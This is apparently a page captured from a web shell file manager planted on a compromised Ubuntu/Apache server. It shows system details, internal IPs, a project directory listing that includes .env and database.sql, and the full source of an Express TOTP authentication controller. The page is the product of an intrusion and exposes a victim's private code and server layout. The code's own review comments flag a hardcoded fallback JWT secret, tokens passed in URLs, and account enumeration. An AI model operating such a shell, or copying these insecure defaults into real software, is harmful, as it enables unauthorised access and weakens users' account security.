Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
/
var /
www /
html /
greenpreneurs /
Name
Size
Permission
Action
api
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
.env
733
B
-rw-r--r--
.gitignore
257
B
-rw-r--r--
ER Diagram.png
140.24
KB
-rw-r--r--
README.md
20
B
-rw-r--r--
auth.controller.js
5.83
KB
-rw-r--r--
database.sql
15.31
KB
-rw-r--r--
nohup.out
1.36
KB
-rw-------
package-lock.json
91.93
KB
-rw-r--r--
package.json
846
B
-rw-r--r--
Code Editor : auth.controller.js
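// api/controllers/auth.controller.js
import pool from "../config/db.js";
import { validationResult } from "express-validator";
import speakeasy from "speakeasy";
import jwt from "jsonwebtoken";
import crypto from "crypto";

// NOTE(review): when JWT_SECRET is unset, tokens are signed with the literal
// below, which anyone who can read this file can use to mint valid tokens.
// The fallback is kept so existing deployments keep starting, but it should be
// removed (fail at startup) once every environment sets JWT_SECRET.
const JWT_SECRET = process.env.JWT_SECRET || "your_jwt_secret";
if (!process.env.JWT_SECRET) {
  console.warn("JWT_SECRET is not set; falling back to an insecure built-in default");
}

const TOKEN_EXPIRY = "1h";
const LOCK_THRESHOLD = 5;
const LOCK_DURATION_MS = 15 * 60 * 1000; // 15 minutes

/**
 * Sends a 400 response listing express-validator errors, if there are any.
 *
 * @param {object} req - Express request that the route validators ran on.
 * @param {object} res - Express response.
 * @returns {boolean} true when a 400 response was sent and the caller must
 *   stop; false when validation passed.
 */
const handleValidation = (req, res) => {
  const errors = validationResult(req);
  if (errors.isEmpty()) {
    return false;
  }
  res.status(400).json({ errors: errors.array() });
  return true;
};

/**
 * Reports whether the account is currently inside its lockout window.
 *
 * @param {object} user - Row from `userdata`.
 * @returns {boolean} true while `locked_until` lies in the future.
 */
const isLocked = (user) =>
  Boolean(user.locked_until) && new Date(user.locked_until) > new Date();

/**
 * Increments the failed-attempt counter and starts a lockout window once the
 * counter reaches LOCK_THRESHOLD.
 *
 * @param {object} user - Row from `userdata`.
 * @returns {Promise<void>}
 */
const recordFailedAttempt = async (user) => {
  // A NULL counter would otherwise turn into NaN and never reach the threshold.
  const fails = (user.failed_attempts ?? 0) + 1;
  const lockUntil = fails >= LOCK_THRESHOLD
    ? new Date(Date.now() + LOCK_DURATION_MS)
    : user.locked_until;
  await pool.query(
    'UPDATE userdata SET failed_attempts = ?, locked_until = ? WHERE CID = ?',
    [fails, lockUntil, user.CID]
  );
};

/**
 * Signs a session JWT for the user and builds the client callback URL.
 *
 * NOTE(review): the JWT travels in the query string, so it can end up in
 * browser history, proxy or server logs and Referer headers; returning it in
 * the JSON body or an HttpOnly cookie would avoid that, but needs a matching
 * client change. `isAdmin` is not part of the signed payload, so it is only a
 * hint for the client and must not be used for authorization.
 *
 * @param {object} user - Row from `userdata`.
 * @returns {string} Relative `/callback?...` URL.
 */
const buildRedirectUrl = (user) => {
  const jwtToken = jwt.sign(
    { id: user.CID, email: user.Email, name: user.Name },
    JWT_SECRET,
    { expiresIn: TOKEN_EXPIRY }
  );
  const params = new URLSearchParams({
    token: jwtToken,
    name: user.Name,
    profilePic: user.ImageURL || '',
    CID: user.CID,
    email: user.Email,
    isAdmin: user.isAdmin ? '1' : '0'
  });
  return `/callback?${params.toString()}`;
};

/**
 * POST /api/auth/register
 *
 * Creates a user with a fresh TOTP secret and eight one-time backup codes.
 * Responds with the otpauth URL and the plain backup codes; only SHA-256
 * hashes of the codes are stored.
 *
 * @param {object} req - Express request; reads `name` and `email` from body.
 * @param {object} res - Express response.
 * @returns {Promise<object|undefined>}
 */
export const register = async (req, res) => {
  // Stop here when validation already answered with a 400; continuing would
  // process rejected input and attempt a second response.
  if (handleValidation(req, res)) {
    return;
  }

  const { name, email } = req.body;
  try {
    // NOTE(review): this reply tells the caller whether an address is
    // registered (account enumeration).
    const [rows] = await pool.query(
      "SELECT CID FROM userdata WHERE Email = ?",
      [email]
    );
    if (rows.length) {
      return res.status(400).json({ message: "Email already registered" });
    }

    // Generate TOTP secret
    const secret = speakeasy.generateSecret({ length: 20 });

    // Generate 8 backup codes: 3 random bytes each, i.e. 6 upper-case hex
    // characters (24 bits).
    const backupCodes = Array.from({ length: 8 }, () =>
      crypto.randomBytes(3).toString('hex').toUpperCase()
    );

    // NOTE(review): unsalted SHA-256 over a 24-bit code space can be reversed
    // by exhaustive search if the table leaks; longer codes would help.
    const hashedBackup = backupCodes.map(code =>
      crypto.createHash('sha256').update(code).digest('hex')
    );

    // Insert user
    await pool.query(
      `INSERT INTO userdata (CID, Name, Email, totp_secret, is_2fa_enabled, created_at, backup_codes) VALUES (UUID(), ?, ?, ?, 0, NOW(), ?)`,
      [name, email, secret.base32, JSON.stringify(hashedBackup)]
    );

    // Return QR and plain backup codes
    const otpAuth = speakeasy.otpauthURL({
      secret: secret.base32,
      label: `IP-Climate:${email}`,
      encoding: 'base32'
    });
    return res.json({ otpAuth, backupCodes });
  } catch (err) {
    console.error(err);
    return res.status(500).json({ message: "Server error" });
  }
};

/**
 * POST /api/auth/login
 *
 * Verifies a 6-digit TOTP code for the account, enforces the failed-attempt
 * lockout, and on success returns the callback URL carrying a session JWT.
 *
 * @param {object} req - Express request; reads `email` and `token` from body.
 * @param {object} res - Express response.
 * @returns {Promise<object>}
 */
export const login = async (req, res) => {
  const { email, token } = req.body;

  // Simple input checks
  if (!email || !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email) || !token || !/^\d{6}$/.test(token)) {
    return res.status(400).send('Invalid input');
  }

  try {
    const [rows] = await pool.query(
      'SELECT * FROM userdata WHERE Email = ?',
      [email]
    );
    if (!rows.length) {
      return res.status(401).send('Invalid credentials');
    }
    const user = rows[0];

    // Account lockout check
    if (isLocked(user)) {
      return res.status(403).send('Account locked. Try again later.');
    }

    // Verify TOTP
    const valid = speakeasy.totp.verify({
      secret: user.totp_secret,
      encoding: 'base32',
      token,
      window: 1
    });
    if (!valid) {
      // The original referenced an undefined LOCK_DURATION here, so the attempt
      // that should have locked the account threw and returned 500 instead.
      await recordFailedAttempt(user);
      return res.status(401).send('Invalid code');
    }

    // Reset failures, mark 2FA enabled, update last_login
    await pool.query(
      `UPDATE userdata SET failed_attempts = 0, locked_until = NULL, is_2fa_enabled = 1, last_login = NOW() WHERE CID = ?`,
      [user.CID]
    );

    // Return callback URL for client redirection
    return res.json({ redirectUrl: buildRedirectUrl(user) });
  } catch (err) {
    console.error('Login error:', err);
    return res.status(500).send('Server error');
  }
};

/**
 * POST /api/auth/backup
 *
 * Logs a user in with a one-time backup code. The code is consumed on success.
 * Failed attempts count toward the same lockout as TOTP login, because the
 * codes are short and this endpoint would otherwise allow unlimited guesses.
 *
 * @param {object} req - Express request; reads `email` and `backupCode`.
 * @param {object} res - Express response.
 * @returns {Promise<object|undefined>}
 */
export const verifyBackup = async (req, res) => {
  if (handleValidation(req, res)) {
    return;
  }

  const { email, backupCode } = req.body;
  // Hash.update() throws on non-string input; answer 400 instead of 500.
  if (typeof backupCode !== 'string' || backupCode.length === 0) {
    return res.status(400).json({ message: "Invalid input" });
  }

  try {
    const [rows] = await pool.query(`SELECT * FROM userdata WHERE Email = ?`, [email]);
    // NOTE(review): the 404 below distinguishes unknown accounts from wrong
    // codes (account enumeration); kept because clients may depend on it.
    if (!rows.length) return res.status(404).json({ message: "User not found" });

    const user = rows[0];
    if (isLocked(user)) {
      return res.status(403).json({ message: "Account locked. Try again later." });
    }

    const codes = JSON.parse(user.backup_codes || '[]');
    const hash = crypto.createHash('sha256').update(backupCode).digest('hex');
    if (!codes.includes(hash)) {
      await recordFailedAttempt(user);
      return res.status(401).json({ message: "Invalid backup code" });
    }

    // Remove used code
    // NOTE(review): read-modify-write without a transaction; two concurrent
    // requests could both accept the same code.
    const newCodes = codes.filter(c => c !== hash);
    await pool.query(`UPDATE userdata SET backup_codes = ? WHERE CID = ?`, [JSON.stringify(newCodes), user.CID]);

    // Use relative path for callback on backup login
    return res.json({ redirectUrl: buildRedirectUrl(user) });
  } catch (err) {
    console.error(err);
    res.status(500).json({ message: "Server error" });
  }
};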